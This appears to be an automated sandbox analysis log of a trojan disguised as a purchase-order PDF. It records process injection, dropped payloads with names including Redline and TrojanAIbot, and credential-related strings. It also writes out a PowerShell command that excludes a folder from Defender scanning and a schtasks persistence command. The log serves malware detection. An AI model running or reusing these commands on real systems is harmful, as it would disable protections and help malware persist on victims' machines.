                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,3_2_00464422
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,3_2_004364AA
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,4_2_04AFCBD0
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Roaming\97dd988331e417df.binJump to behavior
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                            Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-97dd988331e417df73779169-b
                            Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-97dd988331e417df-inf
                            Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-97dd988331e417df9ea72c54-b
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeFile created: C:\Users\user\AppData\Local\Temp\wainageJump to behavior
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: build.exe, 00000007.00000002.2559158756.00000000035E6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000003553000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.000000000353D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeReversingLabs: Detection: 31%
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeVirustotal: Detection: 34%
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeFile read: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                            Source: unknownProcess created: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeProcess created: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe"
                            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                            Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD5D5.tmp.cmd""
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                            Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                            Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                            Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                            Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                            Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                            Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                            Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                            Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                            Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
                            Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
                            Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
                            Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                            Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeProcess created: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"Jump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe" Jump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD5D5.tmp.cmd""
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: webio.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: vaultcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: netutils.dll
